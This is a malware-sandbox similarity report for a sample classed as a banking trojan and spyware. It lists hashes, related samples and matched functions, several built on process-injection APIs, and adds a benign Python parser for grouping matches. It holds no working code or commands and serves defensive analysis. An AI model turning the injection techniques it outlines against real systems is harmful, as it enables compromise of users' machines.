Similarity Report

Overview

General Information

Joe Sandbox Version:23.0.0
Analysis ID:646398
Start date:28.08.2018
Start time:12:55:34
Joe Sandbox Product:Cloud
Overall analysis duration:0h 7m 43s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Zx7i3Q9U9i (renamed file extension from none to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed:14
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:1
Technologies
  • HCA enabled
  • EGA enabled
  • HDC enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.phis.bank.troj.spyw.evad.winEXE@15/13@12/5
EGA Information:
  • Successful, ratio: 100%
HDC Information:
  • Successful, ratio: 22.4% (good quality ratio 22.4%)
  • Quality average: 97.2%
  • Quality standard deviation: 6%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 137
  • Number of non-executed functions: 173
Cookbook Comments:
  • Adjust boot time
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtEnumerateKey calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtReadVirtualMemory calls found.

Static File Info

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.988606409235657
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:Zx7i3Q9U9i.exe
File size:267776
MD5:e2476ed98a57bbb14f45fd1e04d4c43c
SHA1:999a0891ff900227f6a23b95eb708fab5caa7d78
SHA256:bd36dfdb6de9b3785f089dca00c2bbcbdd01a158b6112c5505119c3c9464ef9f
SHA512:3f31c7eebea35265d5fd6e740ca51e29ccd4b5f08f688197c4b4ee2ed81bf82643470535de070f1857a72cbf71bb012fb36659a0431b4edde5d12e29d9500e05
File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Q...?...?...?.......?...>...?...b...?..FN...?..FG...?.Rich..?.........................PE..L......Z...........................

Similarity Information

Algorithm:APISTRING
Total Signature IDs in Database:4106864
Total Processes Database:48838
Total similar Processes:985
Total similar Functions:23722

Similar Processes

  • Zx7i3Q9U9i.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3424)
    • explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 44237 Similar Functions: 79)
    • 87024.exe (PID: 3984, MD5: 1714CF2647A549D0D7529223ACF0FC97 AnalysisID: 56552 Similar Functions: 61)
    • apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 39)
    • 111post.exe (PID: 3632, MD5: 2E3FB8B38E59480ED8F47449A46E2082 AnalysisID: 66610 Similar Functions: 37)
    • crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 37)
    • sort.exe (PID: 3472, MD5: A8B931811E8A8BDB83E0AFF2E1C6E560 AnalysisID: 67025 Similar Functions: 37)
    • crypmgmt.exe (PID: 3564, MD5: 3F602782259014F0253ECDEDFEF4D261 AnalysisID: 68262 Similar Functions: 37)
    • crypmgmt.exe (PID: 3816, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 36)
    • crypmgmt.exe (PID: 3828, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 36)
    • crypmgmt.exe (PID: 3524, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 36)
    • crypmgmt.exe (PID: 3792, MD5: 707D88A25F54B3F8785905F254974BCE AnalysisID: 63657 Similar Functions: 35)
    • foaqDTP.exe (PID: 3540, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 35)
    • gifmsg.exe (PID: 3448, MD5: 5BDD37EDD3740A4E2DA2E05ABDC20A20 AnalysisID: 60136 Similar Functions: 34)
    • gifmsg.exe (PID: 3520, MD5: 5BDD37EDD3740A4E2DA2E05ABDC20A20 AnalysisID: 60136 Similar Functions: 34)
    • crypmgmt.exe (PID: 3524, MD5: 13FFE10E12298A4E8DC1EE7A0B003B93 AnalysisID: 58680 Similar Functions: 34)
    • crypmgmt.exe (PID: 3872, MD5: 0520E2BE92296DE286739115ACA14892 AnalysisID: 57932 Similar Functions: 34)
    • 010.exe (PID: 3696, MD5: 39E01E2F5A5FBFECA5ABC01131E7E3A1 AnalysisID: 63143 Similar Functions: 33)
    • scansione_F24_.jpg.exe (PID: 3776, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 32)
    • crypmgmt.exe (PID: 3532, MD5: B58623B61A3D254FB9FF47FF0A4A74C6 AnalysisID: 66839 Similar Functions: 32)
    • 032901.exe (PID: 3384, MD5: F3C6625D8EDE3FE6C8C4023337D761AC AnalysisID: 66739 Similar Functions: 32)
    • wukapedof.exe (PID: 2468, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 32)
    • yyya.exe (PID: 3736, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 32)
    • 0.exe (PID: 3388, MD5: 8905AD755F4CDCD7C4AF3FD546F67BFC AnalysisID: 65738 Similar Functions: 32)
    • 10.exe (PID: 3420, MD5: 0CEEE3CE1679E892A20AEBA2258A928C AnalysisID: 59085 Similar Functions: 32)
    • crypt_0001_1096b.exe (PID: 3720, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 32)
    • itera.exe (PID: 3940, MD5: 1C84D323D09233F71A6087CD5DA1F24A AnalysisID: 57776 Similar Functions: 32)
    • upsc.exe (PID: 3700, MD5: 5F53229E5AC3246C28629EE07946ADB6 AnalysisID: 63295 Similar Functions: 32)
    • crypt_0001_1096a.exe (PID: 3408, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 31)
    • file2.exe (PID: 3684, MD5: 2B6E31835DAF786F3E9DEEC103C208BB AnalysisID: 66847 Similar Functions: 31)
    • 251287.exe (PID: 3620, MD5: 164138344D25F82E73E5E2EDB810187B AnalysisID: 544867 Similar Functions: 31)
  • d3d8sext.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3520)
    • explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 37523 Similar Functions: 898)
    • cmd.exe (PID: 4004, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 544867 Similar Functions: 247)
    • apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 193)
    • crypmgmt.exe (PID: 3564, MD5: 3F602782259014F0253ECDEDFEF4D261 AnalysisID: 68262 Similar Functions: 178)
    • crypmgmt.exe (PID: 3784, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 172)
    • crypmgmt.exe (PID: 3888, MD5: 28093D270494BF7FD72450B008A4D71A AnalysisID: 68250 Similar Functions: 161)
    • crypmgmt.exe (PID: 3872, MD5: 0520E2BE92296DE286739115ACA14892 AnalysisID: 57932 Similar Functions: 158)
    • crypmgmt.exe (PID: 3816, MD5: 34C71A2B5584813A6BC94888E3669320 AnalysisID: 64003 Similar Functions: 156)
    • crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 156)
    • crypmgmt.exe (PID: 3520, MD5: 2977C206A36F6D0CEC371F9F767DE1D3 AnalysisID: 63005 Similar Functions: 155)
    • crypmgmt.exe (PID: 3524, MD5: C007415B17DF758F2ED04850F95EE60E AnalysisID: 64002 Similar Functions: 155)
    • crypmgmt.exe (PID: 3532, MD5: B58623B61A3D254FB9FF47FF0A4A74C6 AnalysisID: 66839 Similar Functions: 152)
    • crypmgmt.exe (PID: 3828, MD5: 479B945127CC75C2A44ED1B13482FB07 AnalysisID: 67591 Similar Functions: 151)
    • crypmgmt.exe (PID: 3752, MD5: 333EE1C0443D17DF5C79F6C4E40EA594 AnalysisID: 61981 Similar Functions: 150)
    • crypmgmt.exe (PID: 3568, MD5: F3C6625D8EDE3FE6C8C4023337D761AC AnalysisID: 66739 Similar Functions: 150)
    • crypmgmt.exe (PID: 3552, MD5: 2977C206A36F6D0CEC371F9F767DE1D3 AnalysisID: 63005 Similar Functions: 148)
    • crypmgmt.exe (PID: 3460, MD5: 9D985C429B23E924BB4D4ED98778EBBA AnalysisID: 67745 Similar Functions: 141)
    • crypmgmt.exe (PID: 3472, MD5: FA37EB66B10EB030E777AF9420FFCE9A AnalysisID: 66745 Similar Functions: 141)
    • crypmgmt.exe (PID: 4060, MD5: DA7FC1804FFFBD92337277B095147E63 AnalysisID: 64193 Similar Functions: 141)
    • crypmgmt.exe (PID: 2240, MD5: AD22F7E25E6FCCF900B5060D4C5E9532 AnalysisID: 68439 Similar Functions: 141)
    • crypmgmt.exe (PID: 2104, MD5: 3067FCCA87759E8F70DE41B4B5C179D9 AnalysisID: 63270 Similar Functions: 141)
    • crypmgmt.exe (PID: 3524, MD5: 13FFE10E12298A4E8DC1EE7A0B003B93 AnalysisID: 58680 Similar Functions: 141)
    • crypmgmt.exe (PID: 3912, MD5: 39E01E2F5A5FBFECA5ABC01131E7E3A1 AnalysisID: 63143 Similar Functions: 140)
    • crypmgmt.exe (PID: 3740, MD5: DA7FC1804FFFBD92337277B095147E63 AnalysisID: 64193 Similar Functions: 136)
    • crypmgmt.exe (PID: 3552, MD5: B91092360DF199385AC3DC6C3AA8A0E3 AnalysisID: 61691 Similar Functions: 135)
    • cmd.exe (PID: 2956, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51932 Similar Functions: 134)
    • cmd.exe (PID: 3972, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 53359 Similar Functions: 133)
    • cmd.exe (PID: 2364, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51301 Similar Functions: 133)
    • cmd.exe (PID: 2768, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 55548 Similar Functions: 133)
    • cmd.exe (PID: 3876, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 56191 Similar Functions: 133)
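Reading the list above by process name is misleading: the same prior sample MD5 (B6EECE7B...) appears as both apdsroxy.exe and foaqDTP.exe from one analysis, while explorer.exe and cmd.exe carry the hash of the clean system binary across many unrelated analyses, so their 898 and 247 shared functions are most plausibly overlap with code that earlier samples injected into those hosts rather than with the hosts themselves. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox code: it parses a constructed excerpt of this section (lines copied verbatim from the report), collapses matches onto the MD5, and separates likely host binaries from related samples. The "host binary" rule (one hash, one name, several analysis IDs) is this example's own heuristic, not a documented Joe Sandbox semantic.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set, Tuple

# Constructed excerpt: lines copied verbatim from this report's "Similar Processes"
# section, embedded so the parser runs offline.
SIMILAR_PROCESSES = """\
  • Zx7i3Q9U9i.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3424)
    • explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 44237 Similar Functions: 79)
    • apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 39)
    • foaqDTP.exe (PID: 3540, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 35)
    • crypmgmt.exe (PID: 3868, MD5: E5C7B986B6FD3733504DB3FD6D6FAADA AnalysisID: 68428 Similar Functions: 37)
  • d3d8sext.exe (MD5: E2476ED98A57BBB14F45FD1E04D4C43C, PID: 3520)
    • explorer.exe (PID: 1432, MD5: 6DDCA324434FFA506CF7DC4E51DB7935 AnalysisID: 37523 Similar Functions: 898)
    • cmd.exe (PID: 4004, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 544867 Similar Functions: 247)
    • apdsroxy.exe (PID: 3636, MD5: B6EECE7B4FD1B4BD2626AA07E17DA9DE AnalysisID: 60981 Similar Functions: 193)
    • cmd.exe (PID: 2956, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 51932 Similar Functions: 134)
    • cmd.exe (PID: 3972, MD5: AD7B9C14083B52BC532FBA5948342B98 AnalysisID: 53359 Similar Functions: 133)
"""

# Top-level entry: the analysed process, written "(MD5: ..., PID: ...)".
PARENT_RE = re.compile(r"^\s*•\s+(?P<name>\S+)\s+\(MD5:\s*(?P<md5>[0-9A-Fa-f]{32}),\s*PID:\s*\d+\)")
# Nested entry: a process from an earlier analysis, written "(PID: ..., MD5: ... AnalysisID: ... Similar Functions: ...)".
MATCH_RE = re.compile(
    r"^\s*•\s+(?P<name>\S+)\s+\(PID:\s*\d+,\s*MD5:\s*(?P<md5>[0-9A-Fa-f]{32})"
    r"\s+AnalysisID:\s*(?P<aid>\d+)\s+Similar Functions:\s*(?P<n>\d+)\)"
)


def parse_similar_processes(text: str) -> Dict[str, List[dict]]:
    """Return {analysed process name: [match records]} from the two-level bullet list."""
    result: Dict[str, List[dict]] = {}
    current = None
    for line in text.splitlines():
        parent = PARENT_RE.match(line)
        if parent:
            current = parent["name"]
            result[current] = []
            continue
        match = MATCH_RE.match(line)
        if match and current is not None:
            result[current].append({
                "name": match["name"],
                "md5": match["md5"].upper(),
                "analysis_id": int(match["aid"]),
                "similar": int(match["n"]),
            })
    return result


def group_by_md5(parsed: Dict[str, List[dict]]) -> Dict[str, dict]:
    """Collapse matches onto the file hash. The name a prior sample ran under is not an
    identity: the same MD5 appears above as both apdsroxy.exe and foaqDTP.exe."""
    groups: Dict[str, dict] = defaultdict(lambda: {"names": set(), "analyses": set(), "max_similar": 0})
    for matches in parsed.values():
        for m in matches:
            g = groups[m["md5"]]
            g["names"].add(m["name"])
            g["analyses"].add(m["analysis_id"])
            g["max_similar"] = max(g["max_similar"], m["similar"])
    return dict(groups)


def likely_host_processes(groups: Dict[str, dict], min_analyses: int = 2) -> Set[str]:
    """Heuristic (an assumption of this example, not a Joe Sandbox rule): one hash seen under
    a single name across several unrelated analyses is a clean OS binary (explorer.exe, cmd.exe)
    that hosted injected code, so the similarity is with whatever was injected, not the host."""
    return {md5 for md5, g in groups.items()
            if len(g["analyses"]) >= min_analyses and len(g["names"]) == 1}


def related_samples(groups: Dict[str, dict], hosts: Set[str]) -> List[Tuple[str, int]]:
    """Non-host hashes ranked by the strongest function overlap seen with any of our processes."""
    ranked = [(md5, g["max_similar"]) for md5, g in groups.items() if md5 not in hosts]
    return sorted(ranked, key=lambda t: t[1], reverse=True)


if __name__ == "__main__":
    parsed = parse_similar_processes(SIMILAR_PROCESSES)
    groups = group_by_md5(parsed)
    hosts = likely_host_processes(groups)
    for md5, score in related_samples(groups, hosts):
        print(md5, score, sorted(groups[md5]["names"]))
```

On the excerpt this leaves two related hashes (B6EECE7B... at 193 shared functions, E5C7B986... at 37) and sets explorer.exe and cmd.exe aside as hosts; pivoting on those two hashes, or on AnalysisID 60981, is the next step when looking for earlier reports of the same family.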

Similar Functions

  • Function_0000272A API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
  • Function_000177D7 API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
  • Function_0000272A API ID: GetLastError$memcpymemset, String ID: , Total Matches: 409
  • Function_00001175 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
  • Function_0001B212 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
  • Function_00001175 API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 388
  • Function_00002368 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
  • Function_00002368 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
  • Function_000173C8 API ID: CloseHandleCreateFileReadFileSetFilePointer, String ID: , Total Matches: 385
  • Function_00003A60 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
  • Function_00015D18 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
  • Function_00003A60 API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile, String ID: , Total Matches: 377
  • Function_00003B0D API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile, String ID: , Total Matches: 320
  • Function_00003B0D API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile, String ID: , Total Matches: 320
  • Function_000012D2 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 307
  • Function_000012D2 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: , Total Matches: 307
  • Function_000019FB API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess, String ID: , Total Matches: 305
  • Function_000019FB API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess, String ID: , Total Matches: 305
  • Function_0000178F API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
  • Function_0000178F API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
  • Function_0001BC65 API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 297
  • Function_0000321D API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject, String ID: , Total Matches: 294
  • Function_0000321D API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject, String ID: , Total Matches: 294
  • Function_00002DE6 API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 238
  • Function_00002DE6 API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 238
  • Function_00002E27 API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 236
  • Function_00002E27 API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 236
  • Function_00002880 API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 233
  • Function_00002880 API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 233
  • Function_00002E68 API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 229
  • Function_00002E68 API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError, String ID: , Total Matches: 229
  • Function_000022C5 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
  • Function_00017325 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
  • Function_000022C5 API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess, String ID: , Total Matches: 223
  • Function_00003B73 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy, String ID: , Total Matches: 218
  • Function_00003B73 API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy, String ID: , Total Matches: 218
  • Function_0001792D API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset, String ID: , Total Matches: 207
  • Function_00002F3A API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken, String ID: , Total Matches: 204
  • Function_00000093 API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx, String ID: , Total Matches: 199
  • Function_00000093 API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx, String ID: , Total Matches: 199
  • Function_00000673 API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile, String ID: , Total Matches: 194
  • Function_00000673 API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile, String ID: , Total Matches: 194
  • Function_00001033 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001034 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001033 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001034 API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep, String ID: \\.\mailslot\msl0, Total Matches: 190
  • Function_00001CD0 API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf, String ID: <, Total Matches: 183
  • Function_00001CD0 API ID: lstrcpy$CoInitializeExCoUninitializePathFindExtensionShellExecuteExlstrlenmemsetwsprintf, String ID: <, Total Matches: 183
  • Function_00000224 API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen, String ID: , Total Matches: 182
  • Function_00000224 API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen, String ID: , Total Matches: 182
  • Function_00000395 API ID: CreateProcessGetLastErrorHeapFreememset, String ID: D, Total Matches: 162
  • Function_00000186 API ID: HeapFree, String ID: Local\, Total Matches: 157
  • Function_00000186 API ID: HeapFree, String ID: Local\, Total Matches: 157
  • Function_00001427 API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess, String ID: , Total Matches: 154
  • Function_00001427 API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess, String ID: , Total Matches: 154
  • Function_0001C61D API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep, String ID: , Total Matches: 151
  • Function_0001C75C API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleep, String ID: , Total Matches: 151
  • Function_00001E04 API ID: RegCloseKeyRegQueryValueExlstrcpy$CreateDirectoryHeapFreeRegOpenKey$RegCreateKeyRegDeleteValueRegOpenKeyExRtlAllocateHeapStrChrlstrcmpilstrlen, String ID: (, Total Matches: 146
  • Function_00001389 API ID: lstrlenmemset$GetProcAddressLoadLibrary, String ID: ~, Total Matches: 143
  • Function_00001389 API ID: lstrlenmemset$GetProcAddressLoadLibrary, String ID: ~, Total Matches: 143
  • EntryPoint API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate, String ID: , Total Matches: 141
  • Function_00000040 API ID: NtProtectVirtualMemory, String ID: z, Total Matches: 134
  • Function_0001AD3F API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset, String ID: , Total Matches: 131
  • Function_00002BF0 API ID: RegCreateKeyRegOpenKeylstrlen, String ID: , Total Matches: 129
  • Function_0000364F API ID: lstrlen$RtlAllocateHeapwsprintf, String ID: , Total Matches: 128
  • Function_0000AEAE API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread, String ID: , Total Matches: 120
  • Function_000034E2 API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects, String ID: , Total Matches: 117
  • Function_00002F3A API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken, String ID: , Total Matches: 114
  • Function_0001D2F9 API ID: lstrcpy$lstrlenmemcpy, String ID: , Total Matches: 113
  • Function_0000A978 API ID: GetLastError$CancelIoCloseHandleCreateEventGetOverlappedResultReadFileWaitForMultipleObjectsWriteFile, String ID: , Total Matches: 110
  • Function_000171E6 API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess, String ID: , Total Matches: 108
  • Function_00002684 API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf, String ID: , Total Matches: 106
  • Function_00002682 API ID: HeapFree$RtlAllocateHeap$lstrlenwsprintf, String ID: , Total Matches: 106
  • Function_0000CF8E API ID: CloseHandleCreateThreadGetLastErrorHeapFree, String ID: , Total Matches: 105
  • Function_0000ACD2 API ID: CreateFileGetLastErrorWaitForSingleObjectWaitNamedPipe, String ID: , Total Matches: 99
  • Function_000167D8 API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 97
  • Function_0001B371 API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset, String ID: d, Total Matches: 97
  • Function_00001639 API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread, String ID: , Total Matches: 95
  • Function_000010FB API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset, String ID: \\.\mailslot\msl0, Total Matches: 95
  • Function_00001639 API ID: CloseHandleCreateThreadGetExitCodeThreadGetLastErrorWaitForSingleObject$TerminateThread, String ID: , Total Matches: 95
  • Function_000010FB API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset, String ID: \\.\mailslot\msl0, Total Matches: 95
  • Function_00006262 API ID: CloseHandleOpenFileMappinglstrlenmemset, String ID: , Total Matches: 95
  • Function_0001B4E7 API ID: CloseHandleGetLastError$OpenProcess, String ID: , Total Matches: 95
  • Function_0001E4FD API ID: FreeLibraryGetLastErrorlstrlenmbstowcs, String ID: , Total Matches: 92
  • Function_0001699E API ID: GetModuleHandleStrChrlstrcpylstrlen, String ID: , Total Matches: 87
  • Function_0000CCA5 API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError, String ID: , Total Matches: 86
  • Function_00002122 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
  • Function_000189D2 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
  • Function_00002122 API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy, String ID: , Total Matches: 84
  • Function_0000AB92 API ID: CloseHandleGetLastError$ConnectNamedPipeCreateEventDisconnectNamedPipeFlushFileBuffersWaitForMultipleObjectsWaitForSingleObject, String ID: , Total Matches: 83
  • Function_000017F6 API ID: GetLastError$CloseHandleDuplicateHandleOpenProcessRegCloseKeyRegCreateKeyRegOpenKey, String ID: , Total Matches: 80
  • Function_00001B66 API ID: CloseHandleGetLastErrorHeapFreememset, String ID: , Total Matches: 79
  • Function_0001C885 API ID: memcpy$RtlAllocateHeaplstrlen, String ID: , Total Matches: 76
  • Function_00006341 API ID: GetLastError$CloseHandleCreateFileCreateFileMappingGetFileSizeGetTickCountHeapFreelstrcpylstrlen, String ID: Local\, Total Matches: 75
  • Function_0000D37D API ID: GetModuleHandleGetTickCountwsprintf, String ID: {%08X-%04X-%04X-%04X-%08X%04X}, Total Matches: 70
  • Function_00001884 API ID: CreateFileGetLastErrorWaitForSingleObjectlstrcat, String ID: , Total Matches: 66
  • Function_00016CFA API ID: VirtualProtect$GetLastErrorlstrcpylstrlen, String ID: , Total Matches: 65
  • Function_00002C55 API ID: HeapFreeRegCloseKeyRegQueryValueExRtlAllocateHeap, String ID: , Total Matches: 64
  • Function_0001A838 API ID: CloseHandle$LocalFreeRtlDeleteCriticalSectionRtlEnterCriticalSectionRtlLeaveCriticalSectionSetEventSleepWaitForSingleObject, String ID: , Total Matches: 62
  • Function_0000671B API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs, String ID: , Total Matches: 62
  • Function_000001B3 API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory, String ID: , Total Matches: 61
  • Function_00009C3A API ID: memcpy$RtlAllocateHeapmemset$HeapFreelstrcmpi, String ID: , Total Matches: 61
  • Function_00000473 API ID: HeapFreeRtlAllocateHeapwsprintf, String ID: | "%s" | %u, Total Matches: 61
  • Function_0000A593 API ID: RtlAllocateHeaplstrlen$HeapFree_wcsuprlstrcatlstrcpymemcpy, String ID: , Total Matches: 61
  • Function_00003EEE API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf, String ID: , Total Matches: 61
  • Function_000010A7 API ID: HeapFree$lstrlenmemcpy$RtlAllocateHeapSwitchToThreadlstrcpy, String ID: , Total Matches: 60
  • Function_000060F5 API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset, String ID: , Total Matches: 60
  • Function_0000D0EE API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection, String ID: , Total Matches: 60
  • Function_00002ACC API ID: HeapFreeRtlAllocateHeaplstrlen, String ID: EMPTY, Total Matches: 59
  • Function_0000A35F API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next, String ID: , Total Matches: 59
  • Function_0001D3AA API ID: memcpy$GetSystemTimeAsFileTimelstrlen, String ID: , Total Matches: 59
